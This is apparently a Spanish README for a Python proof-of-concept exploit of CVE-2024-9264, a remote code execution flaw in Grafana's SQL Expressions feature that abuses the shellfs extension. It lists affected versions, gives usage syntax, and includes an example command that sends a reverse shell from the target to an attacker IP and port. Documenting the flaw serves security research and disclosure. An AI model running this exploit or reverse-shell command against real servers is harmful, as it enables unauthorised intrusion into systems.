
Exploit de RCE en Grafana (CVE-2024-9264)
Prueba de concepto para la ejecución remota de código en Grafana (CVE-2024-9264)
Este repositorio contiene un script en Python que explota una vulnerabilidad de ejecución remota de código (RCE) en la función de Expresiones SQL de Grafana. Aprovechando una sanitización insuficiente de las entradas, este exploit permite a un atacante ejecutar comandos arbitrarios del shell en el servidor. Esto es posible gracias a la extensión comunitaria shellfs, que un atacante puede instalar y cargar para facilitar la ejecución de comandos.
Viewer o superioresGrafana >= v11.0.0 (todas las v11.x.y están afectadas)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Este script tiene fines educativos y está destinado a usarse en entornos controlados donde tengas permiso para probar la seguridad del sistema. El uso indebido de esta herramienta podría acarrear consecuencias legales.